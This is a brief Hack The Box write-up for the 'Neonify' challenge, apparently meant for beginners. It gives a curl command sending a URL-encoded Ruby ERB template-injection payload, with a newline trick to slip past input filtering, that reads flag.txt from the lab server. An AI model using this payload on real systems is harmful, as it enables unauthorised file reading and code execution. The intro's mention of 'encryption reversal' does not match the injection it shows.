HackTheBox Neonify Writeup

Explore the basics of cybersecurity in the Neonify Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

curl http://94.237.60.154:35761/ -s -X POST -d 'neon=a%0A%3C%25%3D%20File.open%28%27flag.txt%27%29.read%20%25%3E' | grep -Eo 'HTB{.*}'

Summary

Neonify is an easy-level challenge on Hack The Box that exploits a server-side template injection (SSTI) vulnerability. By sending a crafted payload (<%= File.open('flag.txt').read %>) via a POST request, the server executes the embedded Ruby code and returns the content of flag.txt. The flag is then extracted from the response using grep. This challenge demonstrates the dangers of improper input handling in template rendering systems.